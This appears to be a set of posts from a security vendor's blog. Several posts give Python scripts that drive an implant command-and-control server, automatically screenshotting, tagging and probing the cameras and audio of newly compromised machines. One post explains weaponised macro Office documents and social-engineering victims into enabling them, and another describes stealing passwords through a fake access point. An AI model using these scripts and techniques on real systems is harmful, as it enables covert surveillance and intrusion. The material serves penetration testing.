Friday, September 9, 2016

Leveraging INNUENDO's RPC for Fun and Profit: tagging

For the second installment of this series (see the previous here), we're going to take a look at the new tagging functionality that was added to INNUENDO 1.6.

It is now possible to tag both operations and processes, making it much more convenient to organize each in a wide variety of ways. All of this can be done from the INNUENDO Web UI, and you can see a demonstration of that in this video.

This post will demonstrate how you can use RPC to automatically add and remove tags based on the results of operations.

The first step is to set up an event stream, just as we did in the previous post.

>>> import pprint # to make it easier to look through results
>>> import rpc
>>> c = rpc.Client()
>>> for event in c.events():
...     pprint.pprint(event)
None
{'data': {'id': '...'},
 'name': 'machine_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 890128)}
{'data': {'id': '...'},
 'name': 'node_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 927102)}
{'data': {'id': '...'},
 'name': 'process_updated',
 'time': datetime.datetime(2016, 8, 26, 19, 37, 15, 957477)}

This is a typical example of the output from an event stream. Note that it will occasionally return None, which we can safely ignore. For our purposes, the events we are interested in are operation_updated and process_added.

We can loop through the events and process them individually in a tree of if statements as in the previous post, but let's add a layer of abstraction to make life a bit easier.

import rpc

class Monitor(rpc.Client):
    def on_some_event(self, event):
        """Called when "some_event" is emitted."""
        pass


    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

This small subclass lets us define handler methods for the events we're interested in, so supporting a new event is as simple as adding a method. Now we can build on that to begin processing events.

Let's add a handler to queue some operations every time a new process is added.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_process_added(self, event):
        # all process events set event['data']['id'] to the relevant
        # process ID 
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)

That's all it takes. Those operations will be queued for execution with every new process that activates with the C2. This is nice, but it would be even better if we could process the results of those operations somehow.

One way to do that is to wait for the results to come in using
Client.operation_wait or Client.operation_call. However, by taking advantage of the event stream, we can process the results of every operation that is queued (even if queued in the Web UI), not just the ones we queue ourselves in the on_process_added handler.
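For reference, a blocking version might look something like the sketch below. The exact signature of Client.operation_wait and the return value of operation_execute are assumptions here (check the RPC reference for the real ones); the event-driven approach that follows is what we will actually build on.

# A rough sketch of the blocking approach. The operation_wait signature and
# the value returned by operation_execute are ASSUMPTIONS for illustration.
import rpc

c = rpc.Client()
proc_id = '...'  # a process ID taken from a process_added event

oper_id = c.operation_execute('recon', 'assign_aliases', proc_id)
oper = c.operation_wait(oper_id)            # assumed: blocks until finished
attrs = c.operation_attributes(oper['id'])  # results, as in the handlers below
print 'assign_aliases result:', attrs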

So, let's add another handler to process operation results. For this event handler, we'll implement functionality similar to what is done in our monitor method to make it easy to process the results of different operations by adding handler methods.

class Monitor(rpc.Client):
    # ... previous code ...
    def on_operation_updated(self, event):
        # all operation events set event['data']['id'] to the relevant
        # operation ID
        oper_id = event['data']['id']
        # using the operation ID, we can retrieve the operation metadata
        oper = self.operation_get(oper_id)

        # and we can use the metadata to filter out operations that we're not
        # interested in. In this case, operations that are not finished
        if oper['state'] != 'finished':
            return

        # get operation attributes (these are the results)
        attrs = self.operation_attributes(oper['id'])

        # handle operation (if a matching 'handle_' method exists)
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            # pass in both the operation metadata and attributes
            handler(oper, attrs)

Here, we're using a different method prefix (handle_) to define the methods that will handle operation results. Now we just have to add handlers for the operations we're interested in.

class Monitor(rpc.Client):
    # ... previous code ...
    def handle_assign_aliases(self, oper, attrs):
        # assign_aliases offers us a quick way to determine the target's
        # architecture, among other useful bits of info
        arch = attrs['info']['arch']

        # let's tag the process it ran against!
        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['process_id'])
        else:
            # a camera could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:camera', oper['process_id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['process_id'])
        else:
            # audio could be removed, so we should be able to update
            # the tag in that case
            self.process_tag_remove('has:audio', oper['process_id'])

How you tag your processes or operations is up to you, of course. We recommend a naming scheme that includes uniquely identifiable elements so the tags can be used to search for processes/operations.

Any added/removed tag will be reflected immediately in the Web UI.

Here is the full code.

import rpc

class Monitor(rpc.Client):
    ## operation result handlers ##

    def handle_assign_aliases(self, oper, attrs):
        arch = attrs['info']['arch']
        self.process_tag_add('arch:{}'.format(arch), oper['process_id'])

    def handle_camera_query(self, oper, attrs):
        if attrs['cameras']:
            self.process_tag_add('has:camera', oper['process_id'])
        else:
            self.process_tag_remove('has:camera', oper['process_id'])

    def handle_audio_query(self, oper, attrs):
        if attrs['devices']:
            self.process_tag_add('has:audio', oper['process_id'])
        else:
            self.process_tag_remove('has:audio', oper['process_id'])

    ## event handlers ##

    def on_process_added(self, event):
        proc_id = event['data']['id']
    
        # queue some recon operations
        self.operation_execute('recon', 'assign_aliases', proc_id)
        self.operation_execute('recon', 'audio_query', proc_id)
        self.operation_execute('recon', 'camera_query', proc_id)
    
    def on_operation_updated(self, event):
        oper_id = event['data']['id']
        oper = self.operation_get(oper_id)

        # filter
        if oper['state'] != 'finished':
            return

        # get operation attributes
        attrs = self.operation_attributes(oper['id'])

        # handle operation
        handler = getattr(self, 'handle_' + oper['name'], None)
        if handler:
            print 'handling operation:', oper['name']
            handler(oper, attrs)

    ## monitor ##

    def monitor(self):
        """Monitors events for any existing event handlers."""
        # create an event filter based on the existing handlers
        filter = [n[3:] for n in dir(self) if n.startswith('on_')]
        print 'monitoring: {}'.format(', '.join(filter))

        for event in self.events(*filter):
            if not event: continue
            print 'handling event:', event['name']
            handler = getattr(self, 'on_' + event['name'])
            handler(event)

if __name__ == '__main__':
    try:
        Monitor().monitor()
    except KeyboardInterrupt:
        pass

You can watch this script in action in the video mentioned at the top of this post.

Thursday, June 23, 2016

Wireless Penetration Testing: So easy anyone can do it!

My name is Lea Lewandowski and I am the newest member of the admin team at Immunity. I have a Bachelor of Science in Business Administration with a major in Marketing and a minor in Sociology and yes, even I can use SILICA. Prior to joining Immunity four weeks ago, I earned a living working at Starbucks for a year and a half, because like most college graduates, I did not have a full time career to jump right into. Then Immunity came along and decided to give me a shot at this thing called "real life work".  I can honestly say that I was not expecting to learn 'how to hack' during my second week at the company.

When I first heard that I was going to try to learn how to use SILICA I was pretty intimidated. Here I am, with no previous experience in computers or technology, and I'm told to sit in front of this computer and get some passwords. Little did I know, this stuff is all automated. All I have to do is click some buttons. I swear, it is really that easy. SILICA does all of the hard work for you, which makes wireless penetration testing simple even for the non-techies of the world (like me!).

Ironically, my first SILICA lesson was at a Starbucks. We were there for less than half an hour and I was able to steal my own password from myself using the Fake AP (stands for Access Point, btw) feature. I also learned that I needed to fix the security settings on my iPhone. All I had to do was some clicky-clicky and then wait and, lo and behold, I got my password (which I have now changed).

Another feature that I learned how to use in a few minutes was the AP mapping tool. I was able to figure out how to use the AP mapping feature in the office and in my apartment. With this tool, I was able to find the exact location of APs in both places. Pretty interesting stuff. Below is a picture of the AP mapping feature finding an AP in my apartment.
I didn't realize that I had to blur this out so you stalkers couldn't find my house! Learn something new every day.
I created a map image of my apartment, imported it into the location capture tab, and walked around clicking different areas of the map. The outcome was a heat map of the APs around me. I found the AP in my apartment using the heat map, right-clicked the AP for the signal strength, and found exactly where the AP was located. The above image shows the signal strength at its highest because the SILICA was sitting right on top of the AP.

I'd love to sit here and tell you that I figured this all out because I'm some type of genius and a super-fast learner, but that isn't the case. My experience with SILICA, combined with my complete lack of technical knowledge, is proof that anyone can learn how to use it. It has definitely been an awesome, eye-opening introduction to the security world.

Monday, May 23, 2016

The old Office Binder is back for more client-side funsies!



MS Office documents for targeted attacks: Re-Introducing CANVAS's Binderx module.

In targeted attacks, one of the most effective methods of compromising a remote computer is to send the victim a malicious Microsoft Office document with an auto-executed VBA macro. However, MS Office macros are not enabled by default, and when a macro-embedded document is opened it presents a security warning stating that macros have been disabled and offering to “enable content”. To achieve successful exploitation, the attacker must persuade the victim to click the button that allows the embedded macro to run and compromise the system. We will analyze some of the security warnings in the different MS Office versions.

VBA Macros and MS Office's file formats

VBA code (VBA macros) can be included in “legacy” binary formats such as .xls, .doc and .ppt, and in modern XML-formatted documents such as the Office Open XML (OOXML) file format supported by MS Office 2007 and later. Documents, templates, worksheets, and presentations created in MS Office 2007 and later are saved with different file-name extensions ending in an “x” or an “m”. For example, when you save a document in MS Word, the file now uses the .docx extension instead of the .doc extension. To save a macro-embedded document you must save it as a “Macro-Enabled Document”, and the file-name extension will be .docm (or .xlsm, .pptm, etc.).

Illustration 1: Word Macro-Enabled documents in legacy format and OOXML format
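As a side note, OOXML documents are just ZIP containers, and macro-enabled ones carry the compiled VBA project as a vbaProject.bin entry (word/vbaProject.bin for Word, xl/vbaProject.bin for Excel). The small, CANVAS-independent sketch below checks a file on disk for an embedded VBA project; legacy binary formats are simply reported as non-ZIP.

# A minimal check for an embedded VBA project in an OOXML document.
# This is a standalone sketch, not part of the Binderx module.
import sys
import zipfile

def has_vba_project(path):
    if not zipfile.is_zipfile(path):
        return False  # legacy binary formats (.doc/.xls) are not ZIP-based
    with zipfile.ZipFile(path) as doc:
        return any(name.endswith('vbaProject.bin') for name in doc.namelist())

if __name__ == '__main__':
    for path in sys.argv[1:]:
        status = 'macro-embedded' if has_vba_project(path) else 'no VBA project found'
        print '{}: {}'.format(path, status)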


Security Warnings in MS Office releases

VBA macros are not enabled by default in any MS Office version, so the victim will see a warning message that differs between versions.


MS Office 2007





MS Office 2010




MS Office 2016





In summary, the following table describes all messages produced when a Macro-Embedded file is opened. (Tested with legacy files and OOXML format files as well)



                        2007   2010   2013   2016
Security Warning         Yes    Yes    Yes    Yes
Security Alert Window    Yes     No     No     No


As we can see in the table above, in MS Office 2010 and higher versions there is no Security Alert Window. Of course, as we mentioned before, a successful exploitation relies on your social engineering skills to induce the victim to enable the macro execution.

Introducing Binderx module

CANVAS's Binderx module allows you to create an MS Office blank document with an embedded payload that will be executed using a VBA Macro.

Two types of document files can be created with the module: MS Word or MS Excel (using “legacy” format or OOXML format).

It is worth mentioning that MS PowerPoint does not include auto-execution macro support like that available in MS Word and MS Excel.

Additionally, we added support for both Windows MOSDEF shellcode and PowerShell payloads.

Creating a legacy MS Word document with a PowerShell payload
Everyone loves a good shell!


Enjoy it! As always we appreciate any feedback from your experiences with these features during your penetration tests!

Aníbal Irrera.

Wednesday, February 24, 2016

Leveraging INNUENDO's RPC for Fun and Profit: screengrab

INNUENDO 1.5 is on its way, and along with a host of other great features, we've refined the RPC interface.

In this post I want to demonstrate how one can begin layering high-level automation on top of INNUENDO C2 operations using the RPC interface.

Let's start simple. All we want is a screenshot of the target machine every time a new implant process connects to the C2.

The first thing we need is access to the RPC client library. The RPC client can be found in the INNUENDO directory as "<innuendo>/innuendo_client.py". This file actually bundles all of the client dependencies within it, so the only requirement to use it is a Python (2.7) installation.

Once you've copied the client file to your local machine, you simply have to point it at the address and port of the C2 RPC server (and ensure that host/port is accessible, of course).

$ ./innuendo_client.py -u tcp://<c2-host>:9998 ping
ping?
pong!

You'll notice that you have full access to the command-line interface using this file, but we can get quite a bit more flexibility if we import it into Python.

>>> import innuendo_client

This first import bootstraps the environment and gives us access to the RPC client and its dependencies. Now we can import the client library:

>>> from innuendo import rpc

Now, let's connect to the RPC server.

>>> c = rpc.Client('tcp://<c2-host>:9998')
>>> c.module_names()
('exploitmanager', 'recon', ...)

Excelsior! Let's watch some implants sync:

>>> for event in c.events('process'):
...     proc_id = event['data']['id']
...     proc = c.process_get(proc_id)
...     print proc['name'], proc['machine_alias']
netclassmon.exe Windows-7-x64-fuzzybunny
boot64.exe Windows-7-x64-wombat
rundll32.exe Windows-XP-x86-cabbage
boot64.exe Windows-7-x64-fuzzybunny
boot32.exe Windows-XP-x86-cabbage

NOTE: Here we are filtering for process events. If we wanted to grab all node events and any new machine events, we could call Client.events() like this instead: c.events('node', 'machine_added').

By reacting to this event stream, we can now begin to build a layer of automated decision-making on top of INNUENDO. A simple, but very useful option is to execute an operation or group of operations as soon as a new implant first syncs to the C2. Here's an example that takes a screenshot of the target as soon as an implant activates.

>>> for event in c.events('process_added'):
...     proc_id = event['data']['id']
...     c.operation_execute([proc_id], 'screengrab')

This snippet will queue a "recon.screengrab" operation on the C2 for every process that is added while the script is running. The GIF below shows us how it would look in INNUENDO's UI.



Let's take it a bit further and dump thumbnails of the screenshots into a local directory. The full source for catching the right events is below, but first let's just take a step-by-step look at grabbing operation results.

>>> import msgpack
>>> res = c.operation_attributes(oper_id)
>>> attrs = msgpack.unpackb(res)

Since operation attributes can potentially store large binary data, the RPC layer does not automatically deserialize them for you, so we do that with msgpack.

NOTE: msgpack is a serialization library. A pure-Python version is bundled with the client library, but if you need higher performance, you'll want to grab the full package off of PyPI, which includes a C implementation. The client will prefer an installed copy over the bundled copy.

>>> remote_path = attrs['data'][0]['path']

This gives us the path of the screenshot image file on the C2 server. Index 0 is the first of potentially several images that could have been grabbed. Now we just have to ask the C2 for the file and save it locally.

>>> local_path = os.path.basename(remote_path)
>>> with open(local_path, 'w+b') as file:
...     for chunk in c.file_download(remote_path):
...         file.write(chunk)

This will stream the screenshot chunk-by-chunk to a file in the current directory. Let's put it all together!

import os

# bootstrap the client environment
import innuendo_client

import msgpack
from innuendo import rpc

def main():
    print 'waiting'
    
    c = rpc.Client()
    
    # track the operations we want to watch
    oper_ids = set()
    
    for event in c.events('process_added', 'operation_updated'):
        if not event:
            # the server will send out "heartbeat" events periodically
            # we can ignore them
            continue
        
        elif event['name'] == 'process_added':
            print 'process_added: taking screenshot'
            
            # grab the ID of the process that just activated
            proc_id = event['data']['id']
            
            # queue a screengrab operation and track its ID
            res = c.operation_execute([proc_id], 'screengrab', wait=True)
            oper_ids.add(res[0])
            
            print 'operation_added:', res[0]
        
        elif event['name'] == 'operation_updated':
            # grab the ID of the operation that was just updated
            oper_id = event['data']['id']
            
            # make sure it's an operation we are tracking
            if oper_id not in oper_ids:
                continue
            
            # get the operation data so we can check its state
            oper = c.operation_get(oper_id)
            print 'operation_updated:', oper['state']
            
            # wait until the operation is finished
            if oper['state'] != 'finished':
                continue
            oper_ids.remove(oper_id)
            
            # grab and unpack the operation's attributes
            res = c.operation_attributes(oper_id)
            attrs = msgpack.unpackb(res)
            
            # get the remote path of the first screenshot
            remote_path = attrs['data'][0]['path']
            local_path = os.path.basename(remote_path)
            
            # stream the screenshot to a local file
            with open(local_path, 'w+b') as file:
                for chunk in c.file_download(remote_path):
                    file.write(chunk)
            print 'saved:', local_path

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        pass

With this script running, you should see a new screenshot saved to the current directory soon after every new implant process activates. This same procedure can be used to process results from any INNUENDO operation. Stay tuned for more!
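As a takeaway, the result-handling steps above can be distilled into a small reusable helper. The sketch below only uses calls already shown in this post; the placeholder process ID and the overall structure are just for illustration.

# bootstrap the client environment
import innuendo_client

import msgpack
from innuendo import rpc

def wait_for_result(c, oper_id):
    """Block until the given operation finishes, then return its unpacked
    attributes (a sketch built from the calls demonstrated above)."""
    # in case the operation already finished before we started listening
    oper = c.operation_get(oper_id)
    if oper['state'] == 'finished':
        return msgpack.unpackb(c.operation_attributes(oper_id))

    for event in c.events('operation_updated'):
        if not event or event['data']['id'] != oper_id:
            continue  # heartbeat or some other operation
        oper = c.operation_get(oper_id)
        if oper['state'] == 'finished':
            return msgpack.unpackb(c.operation_attributes(oper_id))

if __name__ == '__main__':
    c = rpc.Client()
    proc_id = '...'  # a process ID taken from a process_added event
    res = c.operation_execute([proc_id], 'screengrab', wait=True)
    print wait_for_result(c, res[0])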

Tuesday, February 9, 2016

SILICA NG

SILICA – Mapping access points (looking for Rogue APs)


We are happy to announce a new and exciting feature of SILICA that will be available with the 7.24 release (shortly!).

If you are in charge of protecting the wireless networks of a business, you often worry about rogue access points - that is, APs that have been installed on your secure network without authorization.

SILICA's new AP Mapping feature allows you to quickly and easily build a map of where the APs near you are placed. It is useful not only for finding rogue APs, but also for detecting holes in wireless coverage and spotting possible fake access points (access points external to the network that aim to attack your wireless stations).

The user interface for the data-entry part of this feature is simple. It consists of a map (or optionally you can just eyeball it on the blank canvas, which is what I always do) and buttons to control beacon capture and to set the current location.

The user can record paths as he moves around the office, control the current wireless channel, view intermediate results, undo paths (useful after a mis-click on the map), and save the results to a file. It takes about 30 seconds to figure out - after which you are merrily wandering your office with your SILICA laptop in hand, mapping out every AP you can see.

You can make your maps in MS Paint or use Google Maps for high quality renditions. Or just start with a blank area (this still works).

The results side of this feature is just as capable. There are three basic map types that are produced, using the magic of math:

1) The Heatmap. This map is based on the estimated signal power of the access point that is most powerful in each location.




2) The AP Zones map. This map shows the zones of influence of the more powerful access points. An access point's zone of influence is the area where it is the most powerful one.



3) The captured data map. This map shows the signal power of access points at each location according to the beacon captures, without interpolation or estimation. The user interface allows you to view this map for each access point, both for the average signal power and for the maximum signal power.



For the first two map types, the algorithm that SILICA uses to estimate each access point's location and power is critical. There are various factors that influence the strength of the signal received by the SILICA card: distance from the access point, obstacles that cause reflection or diffraction, the relative angle of the AP's and SILICA's antennas, and interference from other sources. This means the algorithm has to handle a very noisy signal, which is why we use a relatively simple algorithm to estimate the access point parameters - and also why it is best to have more than just three or four points in your walk-path.

The first step is estimating the access point's position: a number (at least 10) of the most powerful signal samples are averaged, and that average position and power are taken as the center of the signal. To calculate the rate of power loss with distance from the center, a linear approximation is fitted using the least-squares regression method.
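To make this concrete, here is a rough sketch of that estimation in plain Python. It is not SILICA's actual code: the (x, y, power) sample format and the use of an unweighted least-squares fit are assumptions made purely for illustration.

# A rough sketch of the estimation described above (not SILICA's code).
# samples: list of (x, y, power) beacon captures for a single access point.
from math import hypot

def fit_line(xs, ys):
    """Least-squares fit of ys = slope * xs + intercept."""
    n = float(len(xs))
    mx, my = sum(xs) / n, sum(ys) / n
    sxx = sum((x - mx) ** 2 for x in xs)
    sxy = sum((x - mx) * (y - my) for x, y in zip(xs, ys))
    slope = sxy / sxx if sxx else 0.0
    return slope, my - slope * mx

def estimate_ap(samples, strongest=10):
    # average the strongest samples to place the AP and its peak power
    top = sorted(samples, key=lambda s: s[2], reverse=True)[:strongest]
    cx = sum(s[0] for s in top) / float(len(top))
    cy = sum(s[1] for s in top) / float(len(top))
    peak = sum(s[2] for s in top) / float(len(top))

    # linear approximation of power loss vs. distance from that center
    dists = [hypot(x - cx, y - cy) for x, y, _ in samples]
    powers = [p for _, _, p in samples]
    loss_rate, _ = fit_line(dists, powers)
    return (cx, cy), peak, loss_rate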

Finding out the zone of influence of each access point is more involved. A naive algorithm would be to calculate the estimated power of every access point at every pixel of the map and select the most powerful signal for each location, but this doesn't scale. What SILICA uses instead is a divide-and-conquer method to find the zones of each access point. This way, the graphs are generated quickly, even for high-resolution maps with many access points.

Example graph of how the map is divided in zones by the divide-and-conquer algorithm:
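For illustration only, the sketch below shows one plausible way such a divide-and-conquer fill could work: if all four corners of a rectangle are dominated by the same access point, the whole rectangle is assigned to it at once; otherwise the rectangle is split and the halves are processed recursively. This is an assumption about the approach, not SILICA's actual algorithm.

# A plausible divide-and-conquer zone fill (a sketch, not SILICA's code).
# aps: list of (name, power_fn) where power_fn(x, y) -> estimated power.
def strongest_ap(aps, x, y):
    return max(aps, key=lambda ap: ap[1](x, y))[0]

def fill_zones(zones, aps, x0, y0, x1, y1):
    """Fill zones[(x, y)] for the inclusive rectangle (x0, y0)-(x1, y1)."""
    # tiny regions: just compute per pixel
    if x1 - x0 <= 1 and y1 - y0 <= 1:
        for y in range(y0, y1 + 1):
            for x in range(x0, x1 + 1):
                zones[(x, y)] = strongest_ap(aps, x, y)
        return
    # if every corner agrees, assign the whole rectangle to that AP
    corners = set(strongest_ap(aps, x, y) for x in (x0, x1) for y in (y0, y1))
    if len(corners) == 1:
        winner = corners.pop()
        for y in range(y0, y1 + 1):
            for x in range(x0, x1 + 1):
                zones[(x, y)] = winner
        return
    # otherwise split the longer side in half and recurse
    if x1 - x0 >= y1 - y0:
        mx = (x0 + x1) // 2
        fill_zones(zones, aps, x0, y0, mx, y1)
        fill_zones(zones, aps, mx + 1, y0, x1, y1)
    else:
        my = (y0 + y1) // 2
        fill_zones(zones, aps, x0, y0, x1, my)
        fill_zones(zones, aps, x0, my + 1, x1, y1)

The corner test is an approximation (a zone could in principle dip inside a rectangle whose corners all agree), which is exactly the trade-off that makes this kind of subdivision fast compared to the per-pixel approach.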


We hope everyone likes the new feature! More interesting updates are on the way, and if you want to ask questions about getting a SILICA, just email sales@immunityinc.com!